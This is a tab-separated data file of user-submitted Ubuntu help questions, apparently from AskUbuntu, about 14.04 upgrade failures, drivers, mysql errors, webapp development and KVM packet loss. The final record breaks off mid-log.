456197	recover files using live cd	i 've got a hard drive with personal files i need . long story short , when i tried to update from 13.10 to 14.04 , ubuntu flipped out and bricked , and now it wo n't boot . i want to just do a fresh install of 14.04 , but i need some files that are on the old bricked installation . i tried to use a live disk to just copy them to an external hard drive , but the system told me that i do n't have the proper permissions to access or edit the files . how can i get these files off before i wipe the old installation and reinstall ?
456200	i ca n't open any file from my ( samsung ) s3 mini on ubuntu 14.04	i hate the way samsung uses to transfer files , i wonder if there is a driver or something i can install to fix this problem because i downloaded a driver on windows in order to use my s3 mini , i am new in ubuntu so please someone help me please . ok this is the problem ... i connect my phone , ubuntu mounts it but i ca n't open any file , only copy or move them . i want to open them directly instead of moving the file to the pc ... please help me ...
456203	load nvidia driver on boot	i installed nvidia manually , everything is ok , but ubuntu starts and stop in low resolution ( during logo ) when i seached for answers i came across this https : //help.ubuntu.com/community/nvidiamanual '' the x server will start in low-resolution if the nvidia driver is not loaded on boot , so $ sudo gedit /etc/modules and add a line containing nvidia `` can anyone explain what should be added to module file that gets opened .
456205	ca n't run in gui mode in newly installed 14.04	i had been using ubuntu 13.04 and i chose the upgrade option from the ubuntu live cd and chose to keep the installed file as it is . the installation successfully completed with an error message saying some older packages may have to be reinstalled . i restarted the computer , but now i ca n't login to the computer in gui mode . it gives an error message that it ca n't find graphics drivers . when i click on the only available button ok , i get the following dialogue box : and then when i click the first option i get this one : which never restarts anything . clicking the second option gives the following : and clicking ok gives the same dialogue box recursively . third option shows a error log file and fourth option lets me smoothly use the ubuntu 14.04 in gui mode and my files are safe in my drive . so how do i get rid of this problem ? i assume graphics drivers come with ubuntu 14.04 itself .
456209	ubuntu 12.10 has stopped working after updating few programs	ubuntu 12.10 installed on a dell vostro 3800 and it is not running after i updated few programs . and i 'm getting following error and my keyboard is n't working either . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system
456211	ubuntu 14.04lts causes network proxy to mess up ?	i have installed ubuntu 14.04 lts 64-bit on my lenovo yoga 2 pro along side windows 8.1 and everything seems to be working fine as far as the os 's . i have done this procedure of dual booting linux and windows on this laptop a few times . but this time , after i edited the blacklist.conf to allow my laptop to connect to the wifi , firefox works for a few seconds and then the network cuts up for every device that 's connected to it ( cell phones , tablets , laptops , and my desktop ) . when i boot to windows 8.1 , it says that there 's a problem with the network proxy . so i hit the little reset button on my modem and unplug/ plug my wifi router . this fixes it . but if i try to use firefox on ubuntu , the same thing happens again . if i use windows after resetting the network , it works normally ... can someone tell me what 's happening exactly or direct me so i can fix it ? thanks
456212	lists , icons , and text fields not displaying properly	in ubuntu 14.04 , the text fields ( like in the text editor ) , icons ( like the list in system settings ) and lists ( like when opening a file , or when listing programs in the software center ) are not being displayed properly . they keep flashing , sometimes becoming invisible or only partially visible . here are two pictures to show what i mean : ( see the top part of the second picture ) this happens even when i use a different wm like metacity or icewm . update : i also noticed that the behaviour is different for different programs . so while geany shows the partial text like in the picture , gedit is either on or off : all the text shows properly most of the time , but when it does get hidden , then all of it hides at the same time , showing a blank screen . nautilus file-selection and application lists in synaptic usually show properly but the items hide when the mouse hovers over them . and , in both synaptic and gedit , hidden text shows up again if i scroll a bit . in geany , however , it stays hidden no matter what i try . it started happening only when i installed 14.04 ; before that ( in 12.04 ) everything was working properly .
456213	mt7630e ralink wireless driver for ubuntu not available !	i installed ubuntu 14 but my wireless is not working ! i googled for driver but i cant found anything . please help guys !
456216	delete the boot partition	boot configuration is on ntfs partition and i have ubuntu side-loaded on my computer . i want to delete the ntfs partition completely and format the drive as ext4 file system . but , i assume that deletes the boot loader as well . please advice on how to proceed .
456217	ubuntu does n't recognize usb disk after upgrade to 14.04	appreciate any thoughts on this . fdisk does not see the usb drive ( s ) . was working until i upgraded from 13.10 - > 14.04 dmesg and lsusb show it : > lsusb bus 002 device 005 : id 058f:6362 alcor micro corp . flash card reader/writer bus 002 device 004 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 002 device 003 : id 0d49:7010 maxtor onetouch < ==================== bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 008 : id 0bc2:2100 seagate rss llc < ===================== bus 001 device 003 : id 03f0:7a04 hewlett-packard deskjet d2460 bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg upon inserting my seagate : [ 28126.919476 ] usb 1-1.4 : usb disconnect , device number 7 [ 29098.566603 ] usb 1-1.4 : new high-speed usb device number 8 using ehci-pci [ 29098.673124 ] usb 1-1.4 : new usb device found , idvendor=0bc2 , idproduct=2100 [ 29098.673129 ] usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 29098.673132 ] usb 1-1.4 : product : freeagent go [ 29098.673135 ] usb 1-1.4 : manufacturer : seagate [ 29098.673137 ] usb 1-1.4 : serialnumber : 2ge2g2st [ 29098.678202 ] usb-storage 1-1.4:1.0 : usb mass storage device detected [ 29098.678311 ] scsi13 : usb-storage 1-1.4:1.0 lsblk only shows internal disks : /proc/scsi/usb-storage > lsblk name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 39.2m 0 part ├─sda2 8:2 0 13.3g 0 part ├─sda3 8:3 0 229.6g 0 part ├─sda4 8:4 0 1k 0 part ├─sda5 8:5 0 8g 0 part ├─sda6 8:6 0 8g 0 part ├─sda7 8:7 0 115.8g 0 part / └─sda8 8:8 0 8g 0 part [ swap ] sdb 8:16 0 2.7t 0 disk ├─sdb1 8:17 0 1.4t 0 part /win-photos └─sdb2 8:18 0 1.4t 0 part /photos sr0 11:0 1 1024m 0 rom i see this in syslog : apr 26 23:26:38 madmax kernel : [ 29098.673135 ] usb 1-1.4 : manufacturer : seagate apr 26 23:26:38 madmax kernel : [ 29098.673137 ] usb 1-1.4 : serialnumber : 2ge2g2st apr 26 23:26:38 madmax kernel : [ 29098.678202 ] usb-storage 1-1.4:1.0 : usb mass storage device detected apr 26 23:26:38 madmax kernel : [ 29098.678311 ] scsi13 : usb-storage 1-1.4:1.0 apr 26 23:26:38 madmax mtp-probe : checking bus 1 , device 8 : `` /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4 '' apr 26 23:26:38 madmax mtp-probe : bus : 1 , device : 8 was not an mtp device < === ? ? ? for what its worth : ii libmtp-common 1.1.6-20-g1b9f164-1ubuntu2 all media transfer protocol ( mtp ) common files ii libmtp-runtime 1.1.6-20-g1b9f164-1ubuntu2 amd64 media transfer protocol ( mtp ) runtime tools ii libmtp9 : amd64 1.1.6-20-g1b9f164-1ubuntu2 amd64 media transfer protocol ( mtp ) library ii libnet-smtp-ssl-perl 1.01-3 all perl module providing ssl support to net : :smtp
456221	installing ubuntu 14.04 with windows 7 opens grub command line	i am a newbie to the world of linux . i wanted to try ubuntu-14.04 ( ubuntu-14.04-desktop-amd64.iso ) on my pc alongside the windows 7 ( 32-bit ) that i already have . my processor supports 64 bit os . i used unetbootin-windows to make a bootable usb . now when i restart my pc to boot from usb , it opens grub command line and i have no idea how to proceed from here . i wish try the ubuntu live first before installing the os . also i wish to use the gui installation instead of the command line . please help .
456222	will ubuntu 14.04 lts work on gigabyte ga-z87-hd3 motherboard	building a computer with midrange specs . but i need to know if ubuntu will run on a gigabyte ga-z87-hd3 motherboard . will i need drivers etc ?
456224	problem with eps file	recently i had installed ubuntu 14.04 , earlier i was using ubuntu 12.04 . i have lots .eps files , some of them are colour image files and some of them are ordinary plots . i use them writing professional journals using latex . i did n't had any problem with ubuntu 12.04 . but now i canât open .eps files ( either with document viewer or gimp ) containing colour images , but i can open .eps file with ordinary plots properly . i even tried latex to make .pdf from these files , it 's converting them , but colour images are no longer in colour , but in gray scale and also the quality is very poor . so please help .
456226	how to install nfs mw 2 using playonlinux or wine	i do n't see the option for nfs most wanted 2 in the install menu for playonlinux . does that mean its not supported ? will it work with wine ? has anybody already done it ?
456227	mysql-server wo n't update and wo n't start	whenever i update , i get errors in mysql configuration : start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : error processing package mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing package mysql-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : mysql-server-5.5 mysql-server i tried removing and re-installing as suggested here , still same result . i have no idea what 's going wrong or how to fix this . the answer to this similar question did not help me either . i tried purging and re-installing and i contantly get errors . i tried manually installing just mysql-server-5.5 . it asked for a password for root , and after giving it one it told me that it is unable to set the password ( the same as happened here ) since the error seems to be related to mysql not able to start , i also tried this : /etc/init.d/mysql start which resulted in : * /etc/init.d/mysql : error : the partition with /var/lib/mysql is too full ! which is weird , because i have plenty of free space and no memory problems at all . i have ubuntu 14.04 . i 'm at wits end , please help ! thanks in advance ! edit this is the output of df -h : filesystem size used avail use % mounted on /dev/sda8 14g 11g 2.5g 82 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 787m 1.5m 786m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 1.3m 3.9g 1 % /run/shm none 100m 76k 100m 1 % /run/user /dev/sda9 429g 142g 265g 35 % /home /dev/sda1 496m 32m 465m 7 % /boot/efi
456230	not showing up to upgrade latest ubuntu version 14.04 ?	i have ubuntu version 12.04 lts and i would like to upgrade to 14.04 lts but somehow , it does n't show up in software update . only show 13.10 . i change the settings to show only latest lts releases and it does n't show nothing at all . why is that ? it 's a silly thing to ask here . sorry about that .
456231	how to associate .torrent files with utorrent server ?	i just installed âľtorrent server for ubuntu 12.04 ( 3.3 build 30470 ) using this step by step guide how to install utorrent step by step ? and it works just fine . now i want to start a torrent just by double-clicking the .torrent file . to do this i need to create an association with utserver . the problem is that utserver does n't have a .desktop file that i can edit in order to make the association . any ideas on how to do this ?
456232	should i upgrade to 14.04lts	i just about 2 weeks ago installed ubuntu 12.04lts . week later a newer lts came out . now i know that i will get to upgrade in june but i do n't know should i upgrade or not . give me suggestions
456237	need to remove windows 8 keeping ubuntu intact ( installed by wubi )	i have installed ubuntu 12.04 by wubi . exe ; now i want to remove win 8 keeping ubuntu as intact , plz help me..
456238	unable to install on toshiba p25-s507 laptop	trying to get ubuntu to install on an old toshiba p25-s507 laptop but not having any luck at all , tried from dvd downloaded online , tried from usb stick , tried using cd boot helper which gives me an error each time 'non-object ' , i 'm on on my 5th dvd and none of them will boot , as of now i 'm using windows xp , i open wubi and it tells me to reboot to install and then the dvd will not boot , what am i missing ? bios settings are set to boot from dvd drive first .
456241	ubuntu 14.04 usually stop working	atter upgraded to ubuntu 14.04 , my laptop usually stop working . when the upgrade is completed , it has shown me some errors which i forgot . my desktop computer has not encountered such error during the update process . how to fix it ? laptop information laptop : asus zenbook uv32vd ultrabook thank you for your attention .
456243	desktop enviornment	my question is what desktop should i use with these specs processor : intel pentium d 2.0ghz memory:1gb ( can upgrade to 2gb ) hard disk:60gb 5400rpm ( will upgrade on to a ssd [ about 80gb ] ) os : ubuntu 12.04 ( soon 14.04 ) give me tips should i start collecting money to upgrade my laptop or give me some desktop tips
456246	wifi is connected but i get 'server not found ' message	i 've just installed ubuntu 14.04 on my laptop , upgrading it from 12.04 . the list of connections tells me i 'm connected to my usual server , but i just get the 'server not found ' message from my browser . i 'm relatively new to ubuntu - can anyone help me ?
456247	dovecot config file is different from what 's on this site	i am running ubuntu , with postfix and dovecot installed , and i am trying to set it up ( i never did that before ) . i 've been googling for a while , but all tutorials tell me to change the line protocols = imap imaps pop3 pop3s or the line mail_location = maildir : ~/maildir but those lines do n't exit in the file . also telnet localhost imap returns a connection refused error , and dovecot is not in the /etc/init.d/ folder , so sudo /etc/init.d/dovecot restart wo n't work . my config file and .
456254	apache envvars from external file	i want to have my global environment variables located in /etc/environ loaded in apache2 to prevent duplication between /etc/environ and /etc/apache2/envvars . i 've seen that other operating systems use /etc/init.d/httpd where you can add a script that solves this issue , but there is no such file on ubuntu . i 've been googling this but could n't find an answer for debian ( and ubuntu in specific ) . edit : i ended up using something different . this is n't a solution for the `` problem '' , but it works . i used the proxy and reverseproxy ( from mod_proxy , make sure you enable proxy_http ) and started the processes myself - thus granting access to the variables in /etc/environment .
456255	touchpad behavior with click and hold	after updating my relese 14.04 , i have observed a modification in the behavior of the tap and hold feature . before i was able to do this ( if i wanted to select a large area of text for example ) : - tap and hold the trackpad and drag my finger across - select a first portion of the text - relese , move my finger to the other end of the trackpad and tap again - the selection would continue from where it was when i released and it would behave as if i had n't release at all this feature is really useful if you want to tap and hold for a long distance and the size of the trackpad along with the pointer speed you selected inhibit you to do so . i do n't know how this feature is called or what to search so i posted my question here .
456262	where can i download these icon theme	i am using 14.04 desktop , on web these tablet icon theme sets are showing off again and again . but anyone knows how can i get them in use ?
456263	how can i recover files from ubuntu one to 14.04 after an installation crash ?	yesterday i received a notification to upgrade to 14.04 . i tried this , but my computer froze for more than 5 hours . now i 've successfully installed the new version and see that all my files are missing . i can see all files on ubuntu one , but synchronization has n't started at all and i am worried that i will not be able to download them back .
456265	ubuntu 14.04 : videos refusing to go fullscreen and freeze on firefox	in firefox on ubuntu 14.04 , just upgraded from 13.10 , i ca n't make any video full screen without issues . when i tried it usual do this : video freezes , and sometimes you can hear the audio , but not always .
456270	generate detatched pgp/signature file	i am creating a few metalinks for an installer similar to wubi . it requires me to create a md5sums-metalink file which i have done but the program will not continue because it requires a md5sums-metalink.gpg file . i am not sure how to generate this and it needs to be something along the lines of -- -- -begin pgp signature -- -- - version : gnupg v1.4.11 ( gnu/linux ) ieyeabecaayfalnriyiacgkqrhgum/u3vfgpaaccc1l9iwsqdozi7kjbgqtm1jew rloanrwatqualc+p5/ekpyisa6jl4gdi =imv7 -- -- -end pgp signature -- -- - which is what the official ubuntu one contains . how can i generate this detached signature in ubuntu ?
456271	14.04 gnome , multi-task windows not hiding when searching from start menu	normally in gnome when you hit the super key it explodes all the windows ( to multi-task between them ) , then if you start to search the windows disappear and your search results are displayed . however , since upgrading to 14.04 the windows still appear over the search results . here 's an image of what i mean : see how i 'm searching for files in the background , yet my chrome window is n't disappearing ? is this a known issue or something specific to my installation ? i 'm using the open source amd graphics drivers if that 's relevant .
456279	seturgent is not working in a webapp	i 'm developing a webapp and in ubuntu 13.10 & 14.04 i found this issue : unity.launcher.seturgent ( true ) ; it 's not working from a web app . i was reading the overview and i think it has to work . ( ? ) you can insert that line in line 24 of this file and see how it 's breaking the runner . thanks in advance !
456281	can i resize the window width from a web app ?	i 'm developing a webapp and in ubuntu 14.04 i have this doubt : can i resize the window width from a web app ? how ? for @ terdon question : code : https : //launchpad.net/unity-webapps-telegram the app is opening always like this : i 'd like open the app with this width : thanks in advance !
456282	mysql workbench on ubuntu 14	hi i just installed the newest version of ubuntu , 14 , and now i need to install mysql workbench . i download the .deb package from mysql site but when i try to install it i obtain this error : preparing to unpack ... /mysql-workbench-community-6.1.4-1ubu1310-amd64.deb ... unpacking mysql-workbench-community ( 6.1.4-1ubu1310 ) ... dpkg : dependency problems prevent configuration of mysql-workbench-community : mysql-workbench-community depends to mysql-client ; however : the mysql-client package did n't install . dpkg : error processing package mysql-workbench-community ( -- install ) : dependency problems - leaving unconfigured processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... errors were encountered while processing : mysql-workbench-community i try to run sudo apt-get -f install and sudo apt-get update , i try to install manually dependecies but did n't work . can you help me ? thank you edit : i ran : `dpkg -- get-selections | grep mysql` and i get this : libdbd-mysql-perl install libmysqlclient18 : amd64 install mysql-client-5.6 install mysql-client-core-5.6 install mysql-common install mysql-common-5.6 install mysql-server-5.6 install mysql-server-core-5.6 install mysql-workbench-community deinstall
456283	unknown display keep appearing after connected with external display	i did a stand alone ubuntu 14.04 ( fresh install ) on my lenovo ideapad z570 . having problem with display setting when using nvidia , problem was with vga could be solved using suggestion from one of community user .
456284	gnome 14.04 : explode windows , wrong screen ?	normally in gnome when you hit the super key the windows explode so you can select between them , and the windows appear on the monitor that they 're opened on . i have 4 monitors , and since upgrading to 14.04 the windows on my far right monitor always appear on my centre screen when i hit the super key . for example , with the windows open normally : yet when i hit the super key : see how window 3 has moved to the middle monitor , but window 1 and 2 have stayed in the same place ( like they should ) ? is this a known issue , or something to do with my configuration ? i 'm using the open source amd drivers if that 's significant .
456287	ho to read/write a local file from a webapp ?	i 'd like to have a config dialog , then i need to read/write a local file from a webapp ? please , how could i do that ? thanks in advance ! for @ terdon question : i 'd like to add an action quicklist which open a config dialog for my webapp . then you could config autostart , mobile/desktop view , enable notifications ... just a config dialog . what webapp ? this : https : //launchpad.net/unity-webapps-telegram what language is it written in ? i 'd like to launch a python app created with glade + python as my gufw app . what system is it running on ? ubuntu 14.04 what have you tried ? nothing , i 'm lost . the api has n't anything about this . i 'm just asking : )
456288	launch a dialog from a webapp	i 'd like to launch a config dialog ( by example made in python in /usr/bin/mydialog ) from a webapp action . can i do that ? please , how ? thanks in advance ! for @ terdon question : i 'd like to add an action quicklist which open a config dialog for my webapp . then you could config autostart , mobile/desktop view , enable notifications ... just a config dialog . what webapp ? this : https : //launchpad.net/unity-webapps-telegram what language is it written in ? i 'd like to launch a python app created with glade + python as my gufw app . what system is it running on ? ubuntu 14.04 what have you tried ? nothing , i 'm lost . the api has n't anything about this . i 'm just asking : )
456290	resolution after installation is lost	i tried to install ubuntu into a computer with a nvidia 7100 graphics . the liveusb has a perfect resolution and a perfect response by default . but after the installation , the desktop has a resolution of 800x640 . i have to install the nouveau or proprietary driver for fixing that . both of them have a right response with unity , but not perfect : ( why has the liveusb a right resolution ? could i reply that resolution after the installation without the nouveau or nvidia driver ? just like the live desktop is doing ? thanks in advance !
456295	how to properly invoke motd for ssh connections with pam disabled	i have configured a nice motd message that shows me lots of relevant infos when i login to my vps via ssh . as password authentication is disabled in sshd_config i would also prefer to disable pam as it 's just not needed . motd is however invoked by pam and if pam is disabled so is the motd message . how can be achieved that motd is displayed for ssh logins with pam disabled in a proper and clean way ? thanks a lot
456297	how to exit wmii interface ?	i installed wmii on my ubuntu14.04 , so i can select which interface to use at the log-in interface . but now i need to install a new language , which requires me to go back to ubuntu original desktop . i want to quit wmii interface instead of restart the machine . can i do thatďź how ?
456298	location menu : hover which gtk3 class themes indicator-datetime	setting .menuitem : hover or .menu .menuitem : hover does not help . i checked the source code gtk3 theme code etc i did also read the source code of indicator . the menu section is 100 % code compatible to ambiance . even replacing menu and unity code parts with ambiance code cs parts and ambiances unity.css won`t help . so i 'm asking here . all other .menuitem : hover or hover menubar menu hover etc are doing fine . why ? the bug is really anoing . bug example - > test mac x theme from noobslab . peraps img is more understandable : regards bluedxca93
456299	state of multitouch gestures in 14.04 / unity	this seems like one of the most-asked items around here , but the ubuntu dev team has been making changes fast in this area , so recent information is important . i 'm on a macbook pro 9,2 . when i installed ubuntu saucy , i got the new and exciting mtrack driver for my touchpad . it seems to work well for all the basic functions and two and three finger gestures seem to be picked up by my applications , at least ( ie firefox 3 button `` back '' , scrolling ) . i would like to customize the gestures though , and maybe add one or two of my own to manage my workspaces/windows . i updated to 14.04 last night to see if multitouch support in the gui was improved ( it does n't look like it ) . i have tried touchegg , but it seems like it relied on utouch which no longer exists in 13 or 14 . it ca n't detect anything from my touchpad , even when i recompiled unity without multitouch , per http : //ineed.coffee/1068/os-x-like-multitouch-gestures-for-macbook-pro-running-ubuntu-12-10/ . most of the doco i 've seen on it assumes you 're using synaptics , so maybe that 's the problem . i have tried ginn , but encountered the same problem - it ca n't detect any input from my trackpad gestures . i have tried easystroke , but it wants me to have a `` gesture button '' which enables gestures . i just want to do them without a special button . this is driving me crazy . i understand that if i switch to ubuntu gnome touchegg should `` just work '' . but do i really have to change my whole shell interface to configure mouse gestures ? does unity really hijack the entire multitouch stack without exposing any of it in a configuration tool ? i feel like this is so ridiculous i must be missing something obvious . any advice would be welcome .
456301	arduino installation	i have downloaded the newest version of arduino ( to use with my arduino due ) from here : http : //downloads.arduino.cc/arduino-1.5.6-r2-linux64.tgz . at the moment i have extracted it into /home/ $ user and am running it by going into arduino-1.5.6-r2 and running the executable directly . how can i have it so it is installed as it would be if i had downloaded it using apt-get install arduino ?
456304	unable to start a qml app using qmlviewer/qmlscene	i 'd like to start writing qml applications . i followed this tutorial : http : //qt-project.org/doc/qt-4.8/qml-tutorial1.html my code is : import qtquick 1.0 rectangle { id : page width : 500 ; height : 200 color : `` lightgray '' text { id : hellotext text : `` hello world ! '' y : 30 anchors.horizontalcenter : page.horizontalcenter font.pointsize : 24 ; font.bold : true } } but i have the following error when i run it using qmlviewer : qmlviewer : could not exec '/usr/lib/x86_64-linux-gnu/qt5/bin/qmlviewer ' : no such file or directory i tried several qml launchers in /usr/lib/x86_64-linux-gnu/qt5/bin/ , qmltestrunner returns : fail ! : qmltestrunner : :tst_ubuntutestcase : :compile ( ) module `` qttest '' is not installed and qmlscene fails with : qmlscene : 'import qtquick 1.0 ' is no longer supported . use qmlviewer to load file 'hello.qml ' . how i 'm supposed to run this tutorial ?
456305	ubuntu server network autoconfigure failed	i 'm novoice ubuntu server user . im using virtualbox to install ubuntu server 13.10 while installation process i got message network auto configuration failed i selected continue now my server installation in completed but not able to connect to it from ssh ifconfig
456308	installing vmware player	i installed vmware player-4.0.6-1035888.x86_64 on my x64 ubuntu 14.04 lts , but when i run it i get this error message : c header files matching your running kernel were not found . refer to your distribution 's documentation for installation instructions . now , i 've run this beforehand : sudo apt-get install build-essential linux-headers- $ ( uname -r ) and the folder named linux-headers-3.13.0-24-generic exists already in /usr/src any solutions ? thanks in advance !
456309	window positioning problem	i have watch a movie on tv via hdmi . now i disonnected from tv , but vlc still loads as second screen available ( but it does n't ) . i checked monitor settings , shows only default monitor ( 1 ) with default resoulution . i attempt to change openbox settings ( i use lxde ) in openbox configuration manager - > windows - > placing windows : place new windows under the mouse pointer center new windows when they are placed those options does n't affect at the vlc window . how to load vlc in visible part of primary monitor and workspace ?
456319	ubuntu booting problem	i have installed ubuntu 12 alongside ubuntu , but when i start my pc there is no option to enter windows 7 or ubuntu . please help me out . i have a lot of my university assignments . thanks in advance .
456320	i have a problem with the projector	when i connect the cable of the projector to the laptop i have to work on the projector only and nothing appears on the laptop 's screen . i want my work to appear in the laptop and in the projector at the same time .
456321	duplicate sources.list entry ubuntu 14.04	i 'm trying to install one software but showing this error .
456323	ubuntu newbie files question	hi all , i 've installed ubuntu desktop onto my n150 netbook . it had 3 hard drive partions : c , d , and e. i installed ubuntu onto partition c and deleted windows 7 on install . everything is working ok , but how can i access my files which were saved to drives d and e ? they were photos , mp3s , etc , that i 'd used previously with windows 7 . can anyone help me access these files ? thanks !
456324	why is the application title bar hidden under unity 's top title bar ?	in ubuntu 14.04 , the title bar of my application goes under the main title bar of unity . in the image below , the selected window is of download manager , but its title bar is hidden under unity 's top title bar . i find this issue occurring with web apps and standalone apps . ideally it should look like this :
456325	packet loss between guests under kvm-qemu	have two guests on ubuntu server 14.04 kvm-qemu . when i ping from guest-1 to guest-2 : guest-1 # ping 10.0.0.2 ping 10.0.0.2 ( 10.0.0.2 ) 56 ( 84 ) bytes of data . 64 bytes from 10.0.0.2 : icmp_req=1 ttl=128 time=1.50 ms *** packets loss *** 64 bytes from 10.0.0.2 : icmp_req=26 ttl=128 time=0.898 ms 64 bytes from 10.0.0.2 : icmp_req=27 ttl=128 time=0.624 ms 64 bytes from 10.0.0.2 : icmp_req=28 ttl=128 time=0.662 ms configuration : guest-1 - two nic , eth0 has address 1.2.3.4 , eth1 has address 10.0.0.3 guest-2 - one nic , eth0 has address 10.0.0.2 host - has bridge br1 host # ifconfig br1 br1 link encap : ethernet hwaddr fe:54:00:11 : d2 : f6 inet addr:10.0.0.1 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :9c18 : eaff : fe8d:10a4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:87375 errors:0 dropped:0 overruns:0 frame:0 tx packets:76414 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:7292173 ( 7.2 mb ) tx bytes:8053821 ( 8.0 mb ) host # brctl show br1 bridge name bridge id stp enabled interfaces br1 8000.fe540011d2f6 no vnet2 vnet7 host # brctl showmacs br1 port no mac addr is local ? ageing timer 2 52:54:00:15:84:51 no 0.68 1 52:54:00:17 : b3:3a no 0.00 2 fe:54:00:15:84:51 yes 0.00 1 fe:54:00:17 : b3:3a yes 0.00 the iptables and ebtables on host is empty , try to tcpdump on host for guest interfaces vnet2 and vnet7 host # tcpdump -pni vnet7 tcpdump : warning : vnet7 : no ipv4 address assigned tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on vnet7 , link-type en10mb ( ethernet ) , capture size 65535 bytes 01:09:36.548777 arp , request who-has 10.0.0.2 tell 10.0.0.3 , length 28 01:09:36.548994 arp , reply 10.0.0.2 is-at 52:54:00:15:84:51 , length 28 01:09:36.549070 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 1 , length 64 01:09:36.549470 arp , request who-has 10.0.0.3 tell 10.0.0.2 , length 28 01:09:36.549596 arp , reply 10.0.0.3 is-at 52:54:00:17 : b3:3a , length 28 01:09:36.549864 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 1 , length 64 01:09:37.550364 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 2 , length 64 01:09:38.557944 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 3 , length 64 01:09:39.565907 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 4 , length 64 01:09:40.573974 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 5 , length 64 ... 01:10:18.877921 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 43 , length 64 01:10:19.855766 arp , request who-has 10.0.0.2 tell 10.0.0.3 , length 28 01:10:19.856088 arp , reply 10.0.0.2 is-at 52:54:00:15:84:51 , length 28 01:10:19.886018 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 44 , length 64 01:10:19.886354 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 44 , length 64 01:10:20.884996 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 45 , length 64 01:10:20.885248 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 45 , length 64 01:10:21.884004 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 46 , length 64 01:10:21.884359 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 46 , length 64 01:10:24.473152 arp , request who-has 10.0.0.3 ( 52:54:00:17 : b3:3a ) tell 10.0.0.2 , length 28 01:10:24.473282 arp , reply 10.0.0.3 is-at 52:54:00:17 : b3:3a , length 28 try tcpdump another host interface host # tcpdump -pni vnet2 tcpdump : warning : vnet2 : no ipv4 address assigned tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on vnet2 , link-type en10mb ( ethernet ) , capture size 65535 bytes 01:09:36.548805 arp , request who-has 10.0.0.2 tell 10.0.0.3 , length 28 01:09:36.548976 arp , reply 10.0.0.2 is-at 52:54:00:15:84:51 , length 28 01:09:36.549077 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 1 , length 64 01:09:36.549454 arp , request who-has 10.0.0.3 tell 10.0.0.2 , length 28 01:09:36.549610 arp , reply 10.0.0.3 is-at 52:54:00:17 : b3:3a , length 28 01:09:36.549707 arp , reply 10.0.0.3 is-at 52:54:00:3a : ef : da , length 28 01:09:36.549849 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 1 , length 64 01:09:37.550411 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 2 , length 64 01:09:37.550690 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 2 , length 64 01:09:38.557979 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 3 , length 64 01:09:38.558371 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 3 , length 64 01:09:39.565930 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 4 , length 64 01:09:39.566290 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 4 , length 64 01:09:40.574000 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 5 , length 64 01:09:40.574414 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 5 , length 64 ... . 01:10:18.877940 ip 10.0.0.3 > 10.0.0.2 : icmp echo request , id 23005 , seq 43 , length 64 01:10:18.878408 ip 10.0.0.2 > 10.0.0.3 : icmp echo reply , id 23005 , seq 43 , length 64 01:10:19.855787 arp , request who-has 10.0.0.2 tell 10.0.0.3 , length 28 01:10:19.856070 arp , reply 10.0.0.2 is-at 